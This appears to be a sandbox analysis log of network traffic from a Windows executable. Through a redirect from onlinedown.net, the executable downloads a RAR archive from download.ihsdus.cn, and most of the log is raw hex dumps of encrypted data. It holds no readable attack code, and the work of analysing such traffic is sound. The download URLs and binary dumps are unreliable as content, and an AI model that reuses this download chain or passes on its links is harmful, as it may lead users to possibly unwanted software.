                                                                                      2023-08-04 16:49:53 UTC3269INData Raw: db 25 8b 17 2e cc 3e fb 76 60 38 e4 16 60 6f d0 bc 2e e4 90 fa 71 93 d7 66 fd 2a 91 88 91 43 5b 61 fa 6e a7 94 c0 d0 16 2e 9f 1c 13 9c ec 6d b6 a7 e4 f5 f5 5d 62 a7 cd 82 b5 43 ac 1f 07 1c 08 eb 77 97 9c a6 03 68 2d eb f9 d3 24 ad 72 77 27 a2 ae d5 7a dd 57 e2 0f e6 69 ef f6 9d d6 e3 0f f2 5c 82 c8 d7 d2 56 8d 66 a2 d7 f1 85 df d0 a7 1e 2d c2 d5 5c 1c 12 ea fd da 0f 1f a5 c4 1b f0 32 ed 11 54 d6 a9 53 e7 ed 1e e5 30 85 bf 87 07 7c 05 41 49 bb 6a 03 f9 ce 82 3c c5 ca 58 b3 28 77 7a b8 11 1c 6a 95 9d da 91 f2 44 e2 97 73 e1 0e 6b bf 75 e0 ae 9e 1f cc ee 9f 9e 51 51 66 32 7d e5 12 17 37 fd 1c c8 c0 0e 68 4a c4 33 e8 d6 b4 b6 bf c2 df bd 3d 8e e8 2c 13 6d ad 45 69 f9 44 83 dd 25 b8 81 1e 53 6a 8d 40 a5 86 bd c5 17 28 25 65 ec 12 b8 01 58 a1 a4 5d 9c 30 84 52
                                                                                      Data Ascii: %.>v`8`o.qf*C[an.m]bCwh-$rw'zWi\Vf-\2TS0|AIj<X(wzjDskuQQf2}7hJ3=,mEiD%Sj@(%eX]0R
                                                                                      2023-08-04 16:49:53 UTC3285INData Raw: fa 24 19 b2 52 08 09 47 f4 3f 4d e7 b2 0e b1 2a 68 12 8f f0 7a a4 fd 21 f4 eb c4 6b 34 6f 93 2b 95 ae 42 5a b7 37 4b db 28 e1 20 4f 48 44 ab 35 2f 6f d1 43 9c 87 60 be 9d 15 a3 9f 82 6e 98 49 74 1e 68 32 cf 00 5e 6e 50 5f 99 e1 0b b5 55 f9 d0 6b da aa fc 16 5e 44 6d cc 6b 47 1b 81 e8 aa e7 d0 38 af 23 fa 08 e7 0d fd d7 e3 f2 72 fb fd e4 7a 38 59 d9 2e d1 21 62 02 38 83 f4 20 1a 9b b8 0f a2 05 8d c9 24 51 57 ff 30 fe 8a d4 4a 89 b5 a4 a6 35 a9 9b b4 a4 7f 9c 84 37 7c db 63 86 c7 95 66 7f ea ea 23 4f 55 f5 fb df 92 a2 c5 73 22 fc 11 75 d6 63 86 1d d4 e0 ab da 9d 8b ab 4f 6a 24 fa 95 bf 66 18 bb 16 e9 99 a4 4a 4a 1a 35 98 54 a9 27 e1 c7 64 a3 30 7e 96 65 91 c7 9e 12 4a eb 0d 4e 11 f7 42 3c 80 f7 0f ed 7b d5 e7 30 ea 3d bd fd e3 2d 7b 94 13 19 8e c8 2f d3 38
                                                                                      Data Ascii: $RG?M*hz!k4o+BZ7K( OHD5/oC`nIth2^nP_Uk^DmkG8#rz8Y.!b8 $QW0J57|cf#OUs"ucOj$fJJ5T'd0~eJNB<{0=-{/8
                                                                                      2023-08-04 16:49:53 UTC3301INData Raw: 09 6e e1 09 4e 8b 4d 50 a4 04 07 6a 62 13 c4 ca b7 43 0b 23 7f 0d cb 8c 16 ef be b1 a9 f9 79 6a 07 7a 62 52 ab a4 d4 9e be 60 6a b8 a1 b1 7f f4 eb a9 15 8e 4d ad 8c a7 d6 18 9b 5a 2e a5 f6 c3 31 a9 29 cf 3b cd fc 6d d8 40 fb 20 af f2 c6 33 7a b2 bd 86 31 c9 a6 f1 64 af 8c 4d 76 78 13 26 6b e2 c9 56 79 42 cd f4 0e 82 ba 3b 94 f7 d8 47 90 52 b4 e0 56 2a 78 13 e9 d3 8e 16 7c d3 d8 1c fa 36 51 0e 7b bb 63 72 f8 88 72 f8 4d f5 98 82 03 2e 43 2f 66 88 36 d0 ec cd 3c 88 52 e3 a6 5f 44 c8 09 de 91 7e ca 59 85 1d a1 b2 1b 3a 7a 13 42 45 c6 eb 0a c7 1e 25 a5 4b c6 3c 72 8e ea a7 d3 06 7c b8 1d 32 56 4e b1 44 98 14 39 5f 21 bd 20 d2 47 ad 9e a1 2b 2e 33 ed 0b e5 da 48 be a8 11 2f 35 f7 15 a2 ca eb fa 63 b8 c1 87 72 a7 86 9f c2 35 e1 c0 20 a1 32 76 53 37 49 67 1e 93
                                                                                      Data Ascii: nNMPjbC#yjzbR`jMZ.1);m@ 3z1dMvx&kVyB;GRV*x|6Q{crrM.C/f6<R_D~Y:zBE%K<r|2VND9_! G+.3H/5cr5 2vS7Ig
                                                                                      2023-08-04 16:49:53 UTC3317INData Raw: 9b 97 30 f4 92 70 e9 93 4b 7f bf d4 15 77 81 bb de f7 8d b3 a3 af 72 6a c2 0f e1 47 1e 71 c9 32 72 29 10 d5 49 c1 05 c2 6d d2 99 99 53 e5 f7 14 4f 4d 00 57 0a 6e 7c df c7 7d 5d b6 8f 99 87 cf c8 99 80 f3 b1 2e 55 97 20 dd d5 8b af 76 92 ba 56 c4 3b 73 0f a7 74 f0 f2 29 b7 3c 27 d2 22 e2 e4 82 66 cb 2d 7f 14 0f 51 df 4e 86 a8 7e 09 44 65 05 46 5d 83 a8 8f 31 4a 1e 0b 51 33 21 0a a6 06 21 f9 4d 4f 30 c9 eb 48 92 19 0f 24 52 e4 06 12 c3 f2 9b c1 24 cf 20 89 19 49 fe 56 45 49 72 90 04 a6 a9 b6 44 61 d3 ce de 60 ea 2a a4 3e 84 d4 af 57 d1 34 4f 9d c6 6a be c6 a7 4f 26 47 aa 03 f3 be 18 89 bb 90 b8 19 88 c5 e7 57 bc 04 57 81 20 11 09 66 c9 81 40 ef 25 08 8a ef 57 40 fc 01 8c cf f1 c5 ab 24 82 f4 5d 6f 19 7a 68 ae 3a 91 ee 22 d2 4d f6 25 e4 7d 5e 06 06 15 28 cc
                                                                                      Data Ascii: 0pKwrjGq2r)ImSOMWn|}].U vV;st)<'"f-QN~DeF]1JQ3!!MO0H$R$ IVEIrDa`*>W4OjO&GWW f@%W@$]ozh:"M%}^(
                                                                                      2023-08-04 16:49:53 UTC3333INData Raw: 2a 1c 17 d6 0e 8e 5b 87 46 a0 2b 41 7b 59 c1 a0 be 6a d5 4d 9d b1 4d da 79 fc 7f 13 37 74 ef 22 fb e7 11 ee b6 98 38 9d 07 6b 38 21 51 cf 32 86 08 44 b3 8b 4e 27 2a 56 fd aa bf b5 bb eb bf d7 e9 b2 99 7f 0a bc 9b ff 70 f6 41 6e 4e 5b 6e df 79 d8 7e c9 a8 eb aa e7 8b 68 96 89 68 35 b9 e1 8f cf e5 ad 00 59 9f bd 84 56 e7 65 07 0c 9d 97 e1 d4 f4 ba 74 d4 16 8f c2 09 37 41 8c 17 f4 e4 24 2f ed 11 8a 5c b3 5a fa 94 b0 b7 df 39 83 28 7a cc c6 0f 72 9e d3 1e 03 50 f2 42 1f 34 e2 ee 68 7b 4c 0a 65 e6 1b 15 2b 3b 1b de fc 74 37 c2 bb e9 13 9b f2 c2 99 27 1a 99 73 bc 6d c6 9a 1e 27 4c bc cb b2 80 b9 97 6c 32 73 2e e2 65 77 b3 5f b0 03 a3 55 e4 bc 84 0f 7b 83 09 80 95 66 72 e6 37 b6 7b a9 63 74 92 2f 7d 46 ba 35 13 d7 ca eb 0b 19 4b b5 6a 98 cb f2 be 4c de e9 48 a6
                                                                                      Data Ascii: *[F+A{YjMMy7t"8k8!Q2DN'*VpAnN[ny~hh5YVet7A$/\Z9(zrPB4h{Le+;t7'sm'Ll2s.ew_U{fr7{ct/}F5KjLH
                                                                                      2023-08-04 16:49:53 UTC3349INData Raw: 06 9c 04 82 bf f2 3e 58 95 ca 65 ff b3 01 fb 33 55 5f bf 8e ca 6f f3 34 bd 8c ab 65 9b fe 8e cb 72 7c 48 5e 2f e1 fa ca 4b 95 f6 cf 5e 12 6b 14 97 a4 ff eb 0a 9d ae 5f 39 5a 9e fe bb 2b d0 7f f3 ef e5 e9 bf fd ad 3f fd bf de a9 b4 2f bc a3 d3 0f 1b e1 4f 9d 2e 2f 7f dd 99 f2 f4 fb cf 96 a7 df 70 be 3c 7d ee 85 4a 7b a9 3a bf 77 6d 95 ed d4 19 ce 55 cd 0b c2 cb 95 75 9c 6f 54 87 bd 5e 29 ea ac e3 95 7a fe 39 f9 e6 15 ef a1 19 55 f6 cf 01 95 fe aa 42 7f 63 0e 68 37 55 95 d5 fb 8b 06 fd 88 41 7f 21 54 3e fc 1b ad e5 e9 81 70 95 ed dc cf 50 ee 8f 1a 7c 3f eb 75 69 6f 28 f7 a6 3e 7b ee 2c 1f df 8e 48 79 fa 6d 51 7f 7b b1 8e 89 f2 e1 bf 37 a8 d3 cd 74 3c 9f 74 75 7f 49 b9 37 e3 79 73 a8 aa 98 cf 8f 2a f7 4f 0f 95 8f ff 9e 9d fe f1 7f ee a1 2a fb d6 87 fc e9 f7
                                                                                      Data Ascii: >Xe3U_o4er|H^/K^k_9Z+?/O./p<}J{:wmUuoT^)z9UBch7UA!T>pP|?uio(>{,HymQ{7t<tuI7ys*O*
                                                                                      2023-08-04 16:49:53 UTC3365INData Raw: ea 66 45 13 3b 0b 27 5d 41 be 23 b8 c7 98 58 ab f8 75 4b 9a 1a 97 5e 11 b9 0f 97 1c 38 92 5e 06 6e a4 3b c1 03 71 7c 4a ec ec 56 23 c3 4f 10 63 53 cf c2 de 9d 5e 29 44 93 67 93 41 2e 4a 4c 53 a6 a8 d2 cf 00 73 12 7a 1f e2 b3 44 b5 04 f5 28 81 da 67 ac 8c 10 e2 5c e9 95 11 d0 89 a2 3b 46 64 41 b3 51 89 4c d8 9e 1a 95 f2 ee dd 67 54 1b f9 28 57 2d cb f0 53 cc b8 3f fd 32 19 97 d5 af f0 33 5b 49 ca 29 41 e5 1a 2f d9 9b a4 a8 c0 7e 66 15 7b bb e3 40 4c 34 69 a5 0c 35 01 31 c9 b5 4a ca 03 0d 75 6a 66 fb 57 c1 6d af 6f 9d da 68 01 59 f1 33 7e b9 6b 3b cb 08 8b c1 5d 45 54 f7 22 cd d1 48 29 83 35 8b 7e 82 0f 68 ad 5d 8b 8d 85 38 62 8e 85 b0 25 cd 11 b4 dc 6a 60 15 e1 26 e4 aa 63 99 ed 6d 8e fc 80 c6 9d 3d bc 32 78 7d fd 0d 7d 2e 90 b5 88 f6 38 9c a8 36 b8 04 c0
                                                                                      Data Ascii: fE;']A#XuK^8^n;q|JV#OcS^)DgA.JLSszD(g\;FdAQLgT(W-S?23[I)A/~f{@L4i51JujfWmohY3~k;]ET"H)5~h]8b%j`&cm=2x}}.86
                                                                                      2023-08-04 16:49:53 UTC3381INData Raw: a3 c0 7b a9 06 98 f9 77 a8 e0 ef 9e 46 eb a9 70 f5 ff f6 c1 f3 54 ff d1 47 b0 fa 53 69 f5 9f 53 f7 43 e8 44 37 e5 7c 75 6f 16 75 fa ac 92 e0 c1 25 39 bf e8 7d 3c 11 a5 e0 cd d4 54 f2 73 a8 a9 e6 73 a9 09 b3 77 6a 26 f3 53 d0 9c c2 4f a0 4e 0d 3f 8a 9a a9 fc 55 d4 1c cd 5f 41 cd b1 bc 8a 9a 69 fc 00 6a 4e e2 83 47 d0 4c e1 bb a9 39 95 ff 92 9a d3 f8 cf 8e 60 0e 75 c1 4a 1d df 4a 51 39 fc 11 6a ce e2 0f 50 33 8f df 45 4d 23 ff 2a 35 0b f9 1d d4 9c c7 3f 43 cd 85 fc 16 6a 2e e1 37 50 b3 8c 7f 90 9a 36 7e 2d 35 1d 7c 3d 35 dd fc 72 6a 32 3c 43 cd 6a de 41 cd e5 7c 99 98 85 17 71 4b 85 37 23 f6 45 5c 22 f3 b7 52 2b 1e e7 e0 75 d4 8a 72 0e fc 64 6a c5 41 99 bf 9e 5a 1f a4 6a 39 a9 f5 61 b4 26 51 eb 06 aa 54 82 5a f1 46 33 fe 2c 32 c0 5f dc 42 0f 95 52 eb 56 b4
                                                                                      Data Ascii: {wFpTGSiSCD7|uou%9}<Tsswj&SON?U_AijNGL9`uJJQ9jP3EM#*5?Cj.7P6~-5|=5rj2<CjA|qK7#E\"R+urdjAZj9a&QTZF3,2_BRV
                                                                                      2023-08-04 16:49:53 UTC3397INData Raw: 69 35 8a a8 82 3d 32 03 74 6d 0e 2d a1 fb a8 01 58 54 2c 9e a5 02 0e 67 81 1c 4b e0 3e b5 8f 19 80 c3 78 9e c4 b3 f8 53 80 c3 52 5e c6 8f f2 48 bb b1 dd ce 2e 0f b2 77 d4 b7 01 f1 38 3c 19 e8 cd c5 8b f0 32 bc 12 97 e2 0d b0 ea 5d b0 e2 13 f8 1c fe 01 47 98 d1 66 8c 59 cf 6c 60 36 33 2d 53 99 73 cc 62 b3 9d 88 77 8a 9d 15 80 dd 1d ce 51 c0 6d 6d 59 4f c6 ca 06 b2 b1 44 d2 92 36 60 38 5e 26 ca 76 32 49 a6 c8 2e 80 e4 9e 32 55 66 c8 39 6a 2e ec 91 8b d4 62 b5 0c ee 30 2b 55 89 2a 55 65 6a 83 da ac b6 a9 1d 6a 97 da a7 0e a9 a3 ea 84 3a ad ce a9 8b ea 07 65 e8 08 1d a9 a3 75 35 d8 49 6b eb 7a 3a 56 37 d0 8d 75 33 8d b4 a5 6d ad 74 bc 4e d4 ed 74 92 4e d1 a9 3a 4b e7 e8 fe ba 50 0f d1 c3 f4 70 d8 73 9f d2 e3 00 09 fd dd 42 37 e4 a5 0d a5 50 0a a5 50 0a a5 50
                                                                                      Data Ascii: i5=2tm-XT,gK>xSR^H.w8<2]GfYl`63-SsbwQmmYOD6`8^&v2I.2Uf9j.b0+U*Uejj:eu5Ikz:V7u3mtNtN:KPpsB7PPP
                                                                                      2023-08-04 16:49:53 UTC3413INData Raw: 79 85 73 02 54 e0 7e e7 76 e7 a7 f0 e7 d1 ae 21 ae cb 5c b2 eb 5d d7 01 d7 7b 74 9f a3 95 f2 7f 1e 7b 3d 77 3b 77 66 a2 4b 10 7e 27 70 82 42 d7 f1 a6 08 6e 61 d6 19 63 73 9d b8 41 3c 2e f6 93 e2 25 15 0a b5 5b fa 54 da 2f 0d 93 47 cb 73 e5 59 8a b7 77 07 68 7f e4 a8 54 7c 61 0c 58 f5 42 fd 52 7d 8c ee 46 6d 5e d1 77 ea 5f e9 a3 d0 cb 73 d1 97 3f d7 47 7b e0 3e 6c ae 99 60 b6 4c 70 14 93 62 a5 67 a3 b3 d8 e5 dc 1a e0 4d e6 a7 43 7b 16 f3 f7 f3 9b f8 ad 40 50 3f 61 1c d0 33 1d 58 d9 00 5c b8 c4 99 e2 02 71 bd f8 9c b8 53 fc 4a 8c 92 06 4b 23 a4 a9 48 fa 8b a4 4a a9 4e 6a 90 be 96 8e 4b 83 30 d6 d3 e5 2c a4 d3 27 e4 5d f2 b7 72 3f e5 42 30 f7 6d ca fd 4a bd f2 77 e5 b0 62 55 2f 46 2a 5d a5 fe 45 6d a0 59 e0 5f aa 55 9b 08 ed bf 47 7b 4b fb 56 53 91 07 c8 5a
                                                                                      Data Ascii: ysT~v!\]{t{=w;wfK~'pBnacsA<.%[T/GsYwhT|aXBR}Fm^w_s?G{>l`LpbgMC{@P?a3X\qSJK#HJNjK0,']r?B0mJwbU/F*]EmY_UG{KVSZ


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.349713221.204.21.100443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-08-04 16:48:28 UTC6OUTHEAD /iopdfbhjl/10042231?module=download&t=website&v=20230805004821 HTTP/1.1
                                                                                      Host: www.onlinedown.net
                                                                                      Accept: */*
                                                                                      Accept-Encoding: deflate, gzip
                                                                                      Referer: https://www.onlinedown.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
                                                                                      2023-08-04 16:48:29 UTC6INHTTP/1.1 302 Found
                                                                                      Date: Fri, 04 Aug 2023 16:48:29 GMT
                                                                                      Content-Type: application/force-download
                                                                                      Connection: close
                                                                                      Server: openresty
                                                                                      Set-Cookie: HWWAFSESID=5b47273721905d2ef8; path=/
                                                                                      Set-Cookie: HWWAFSESTIME=1691167709472; path=/
                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                      Expires: 0
                                                                                      Location: https://download.ihsdus.cn/down/2022down/1/05/wyyyyncmwjzh.rar?timestamp=64cd2bdd&auth_key=711023fa949fb7fcd92687a16aff0b79
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization
                                                                                      X-CCDN-Origin-Time: 217
                                                                                      via: CHN-SXtaiyuan-AREACUCC1-CACHE8[241],CHN-SXtaiyuan-AREACUCC1-CACHE18[233,TCP_MISS,236],CHN-TJ-GLOBAL1-CACHE86[220],CHN-TJ-GLOBAL1-CACHE48[217,TCP_MISS,219]
                                                                                      x-hcs-proxy-type: 0
                                                                                      X-CCDN-CacheTTL: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.349716120.52.95.245443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-08-04 16:48:30 UTC7OUTHEAD /down/2022down/1/05/wyyyyncmwjzh.rar?timestamp=64cd2bdd&auth_key=711023fa949fb7fcd92687a16aff0b79 HTTP/1.1
                                                                                      Host: download.ihsdus.cn
                                                                                      Accept: */*
                                                                                      Accept-Encoding: deflate, gzip
                                                                                      Referer: https://www.onlinedown.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
                                                                                      2023-08-04 16:48:31 UTC7INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:48:31 GMT
                                                                                      Content-Type: application/x-rar
                                                                                      Content-Length: 3031946
                                                                                      Connection: close
                                                                                      Server: openresty
                                                                                      CloudServiceDiscount: CDN
                                                                                      x-obs-request-id: 00000189C173608C9764688E6B17F989
                                                                                      ETag: "bfa0d1fac33dbeb4d50c832a97097dd8"
                                                                                      Last-Modified: Sun, 20 Nov 2022 09:39:18 GMT
                                                                                      x-obs-id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCSXniP8jzFGe0aq1R1rXSIPEwI6KW85H
                                                                                      X-CCDN-Origin-Time: 53
                                                                                      via: CHN-HElangfang-AREACUCC1-CACHE57[82],CHN-HElangfang-AREACUCC1-CACHE23[72,TCP_MISS,81],CHN-TJ-GLOBAL1-CACHE90[66],CHN-TJ-GLOBAL1-CACHE23[53,TCP_MISS,64]
                                                                                      x-hcs-proxy-type: 0
                                                                                      X-CCDN-CacheTTL: 2592000
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.2.349719120.52.95.247443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-08-04 16:48:32 UTC8OUTHEAD /down/2022down/1/05/wyyyyncmwjzh.rar?timestamp=64cd2bdd&auth_key=711023fa949fb7fcd92687a16aff0b79 HTTP/1.1
                                                                                      Host: download.ihsdus.cn
                                                                                      Accept: */*
                                                                                      Accept-Encoding: deflate, gzip
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
                                                                                      2023-08-04 16:48:33 UTC8INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:48:33 GMT
                                                                                      Content-Type: application/x-rar
                                                                                      Content-Length: 3031946
                                                                                      Connection: close
                                                                                      Server: openresty
                                                                                      CloudServiceDiscount: CDN
                                                                                      x-obs-request-id: 00000189C173687497681CDF1275535A
                                                                                      ETag: "bfa0d1fac33dbeb4d50c832a97097dd8"
                                                                                      Last-Modified: Sun, 20 Nov 2022 09:39:18 GMT
                                                                                      x-obs-id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCSojmzxJkuGuIhs9isWazZ39z6MR/3rb
                                                                                      X-CCDN-Origin-Time: 54
                                                                                      via: CHN-HElangfang-AREACUCC1-CACHE4[67],CHN-HElangfang-AREACUCC1-CACHE23[62,TCP_MISS,63],CHN-TJ-GLOBAL1-CACHE42[57],CHN-TJ-GLOBAL1-CACHE23[54,TCP_MISS,54]
                                                                                      x-hcs-proxy-type: 0
                                                                                      X-CCDN-CacheTTL: 2592000
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      5192.168.2.349723120.52.95.245443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-08-04 16:48:35 UTC9OUTHEAD /down/2022down/1/05/wyyyyncmwjzh.rar?timestamp=64cd2bdd&auth_key=711023fa949fb7fcd92687a16aff0b79 HTTP/1.1
                                                                                      Host: download.ihsdus.cn
                                                                                      Accept: */*
                                                                                      2023-08-04 16:48:36 UTC9INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:48:35 GMT
                                                                                      Content-Type: application/x-rar
                                                                                      Content-Length: 3031946
                                                                                      Connection: close
                                                                                      Server: openresty
                                                                                      CloudServiceDiscount: CDN
                                                                                      x-obs-request-id: 00000189C17372799765158200D0F479
                                                                                      ETag: "bfa0d1fac33dbeb4d50c832a97097dd8"
                                                                                      Last-Modified: Sun, 20 Nov 2022 09:39:18 GMT
                                                                                      x-obs-id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCSu6GjkseSGSHg9YFqeD4XtZhhmIOYS6
                                                                                      X-CCDN-Origin-Time: 44
                                                                                      via: CHN-HElangfang-AREACUCC1-CACHE16[58],CHN-HElangfang-AREACUCC1-CACHE23[55,TCP_MISS,58],CHN-TJ-GLOBAL1-CACHE34[50],CHN-TJ-GLOBAL1-CACHE23[44,TCP_MISS,47]
                                                                                      x-hcs-proxy-type: 0
                                                                                      X-CCDN-CacheTTL: 2592000
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      6192.168.2.349726218.12.76.161443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-08-04 16:48:37 UTC9OUTGET /down/2022down/1/05/wyyyyncmwjzh.rar?timestamp=64cd2bdd&auth_key=711023fa949fb7fcd92687a16aff0b79 HTTP/1.1
                                                                                      Host: download.ihsdus.cn
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
                                                                                      Accept: */*
                                                                                      Referer: https://www.onlinedown.net/
                                                                                      2023-08-04 16:48:37 UTC10INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:48:37 GMT
                                                                                      Content-Type: application/x-rar
                                                                                      Content-Length: 3031946
                                                                                      Connection: close
                                                                                      Server: openresty
                                                                                      CloudServiceDiscount: CDN
                                                                                      ETag: "bfa0d1fac33dbeb4d50c832a97097dd8"
                                                                                      Last-Modified: Sun, 20 Nov 2022 09:39:18 GMT
                                                                                      x-obs-id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCSje0DIQ0z710K8UR68DRIcCxxHx6ivb
                                                                                      x-obs-request-id: 000001857C285C0A904702D8E8C257B0
                                                                                      X-CCDN-Expires: 2050881
                                                                                      via: CHN-HEshijiazhuang-AREACUCC1-CACHE38[24],CHN-HEshijiazhuang-AREACUCC1-CACHE23[0,TCP_HIT,21],CHN-TJ-GLOBAL1-CACHE120[20],CHN-TJ-GLOBAL1-CACHE23[0,TCP_HIT,18]
                                                                                      x-hcs-proxy-type: 1
                                                                                      X-CCDN-CacheTTL: 2592000
                                                                                      nginx-hit: 1
                                                                                      Age: 17822619
                                                                                      Accept-Ranges: bytes
                                                                                      2023-08-04 16:48:37 UTC10INData Raw: 52 61 72 21 1a 07 01 00 ef ba cd 16 0c 01 05 08 00 07 01 01 ee 84 b9 81 00 d7 6e 2e e8 66 02 03 3c c0 b7 b5 81 00 04 80 c0 9e 83 00 20 73 46 71 dc 80 33 00 13 6e 63 6d e6 96 87 e4 bb b6 e8 bd ac e6 8d a2 2e 65 78 65 30 01 00 03 0f e0 c1 3a f9 81 6e 27 d0 2a 83 b3 e6 47 3c 33 c9 87 eb ef 77 69 08 18 27 a0 00 e9 3f 27 63 27 8b 6a 19 6f 74 a7 a7 8b 4f 31 6e a8 f4 0a 03 02 67 e9 16 69 5e 5a d4 01 24 f5 b5 c7 52 65 6a 82 53 a3 04 29 c4 e3 38 e8 b7 dd 53 a2 1f 7c 2a 8b 74 14 9f e1 d1 f3 4c 8b 9f 59 08 a6 84 75 da 70 54 e3 03 d0 4e f3 19 b4 df 2a e0 f0 b3 ac e7 51 ba 43 45 aa 92 3e 84 92 b5 77 e7 b8 96 24 53 3c 36 04 e2 ba d6 65 d8 91 2b 6a 7f 71 c6 0f 9f 81 bd 41 68 c7 23 ea 2a 42 d4 cb 4a 31 3c 6c fb d0 db b5 5c 0c bd b9 f2 e0 ee d5 68 28 d9 fd 3f 05 fd 29 cf
                                                                                      Data Ascii: Rar!n.f< sFq3ncm.exe0:n'*G<3wi'?'c'jotO1ngi^Z$RejS)8S|*tLYupTN*QCE>w$S<6e+jqAh#*BJ1<l\h(?)
                                                                                      2023-08-04 16:48:38 UTC14INData Raw: 5f e8 ca 00 50 c4 1b 79 46 21 21 0e d8 70 ad 16 33 4d 3c 5d 1a 14 98 8b c1 48 7c eb 39 d2 8f 97 f0 02 54 0c e7 cd 9b c6 18 6e b2 ab d3 34 fe 99 ef bb ef 15 7a 62 b7 e1 e7 2d c4 6f cd 8e b0 fa 27 e0 b6 7b e3 ee c5 f8 4f 41 60 43 78 b4 4b e2 c0 d2 24 70 7e 65 e4 85 fe 62 30 50 f6 ee e8 bb 44 e3 8a 0e 4f 49 6b 3c a3 fb 4b f3 cf 2b 8b cc 2a de db 81 81 d0 80 17 ab 13 09 ea e2 97 35 6c ee b7 8e 2c 6d 89 75 52 9d 69 e3 9f e4 b7 ea 8e 00 73 0c 0b cf 44 de 18 29 2f 31 87 e2 bd 0b 21 75 3f 49 e4 b9 90 c2 e1 20 5a f2 11 d1 95 2a ea 82 c8 1f aa 7a a6 9c 83 1c 90 65 8c d1 af 91 58 8b 97 91 e4 39 3c 7b db 10 41 b9 92 9f 53 bf 48 d1 55 7b e1 3d e5 f6 26 d0 e1 0e 4b 05 dc 29 bf c1 d5 c7 7f b8 85 fe fe 93 55 f8 62 cc b5 52 a6 b0 a2 2a 57 ef 28 df b2 e4 30 a3 68 8c cb df
                                                                                      Data Ascii: _PyF!!p3M<]H|9Tn4zb-o'{OA`CxK$p~eb0PDOIk<K+*5l,muRisD)/1!u?I Z*zeX9<{ASHU{=&K)UbR*W(0h
                                                                                      2023-08-04 16:48:38 UTC18INData Raw: 77 32 ad 58 c5 6f ef a9 5e 9b 16 3a c0 1a cb 69 3a 8b 34 7e 9f 70 c6 af a6 17 c4 55 44 ff c8 f4 7c da 6c 9e 88 5e ce ed e2 57 80 3b 29 c8 10 c6 50 6a 6d ab c5 00 a4 27 69 97 0c 2d 96 a6 21 ea 3f 41 a2 d5 a1 f1 12 83 f8 53 4d c1 fd c9 75 ca 50 40 dd 83 72 7c 9e 53 73 46 3b 46 f6 5f 5c 2b 03 29 4a ef 17 85 5b cb df f2 81 44 d2 e5 9c e1 5b d1 f4 5c 8c 6d e0 fb 8d 10 36 58 d2 97 b7 3f 1a 51 3f 66 cc d2 4e 0d 43 4d d2 a3 71 57 2b 7f 8d e8 4d f6 f1 61 9d cd c9 31 9e e0 eb 18 2c ab 53 e1 ab b7 e3 89 8d 03 1b 24 44 38 14 b4 d9 bd bb 98 30 1a a5 00 eb 5f d8 c4 47 48 dd 13 29 2e 27 fe 5c 8b a7 28 e8 73 a2 ec b8 48 35 97 b9 41 95 4e dc fe 06 c5 f4 3e 22 95 f5 62 32 7d 10 2a 13 35 b8 d9 3d 87 5e 81 93 bb 97 e4 f3 46 7d b1 ee 2b 76 bc 6e ea 8d b9 62 62 61 4a ac f8 34
                                                                                      Data Ascii: w2Xo^:i:4~pUD|l^W;)Pjm'i-!?ASMuP@r|SsF;F_\+)J[D[\m6X?Q?fNCMqW+Ma1,S$D80_GH).'\(sH5AN>"b2}*5=^F}+vnbbaJ4
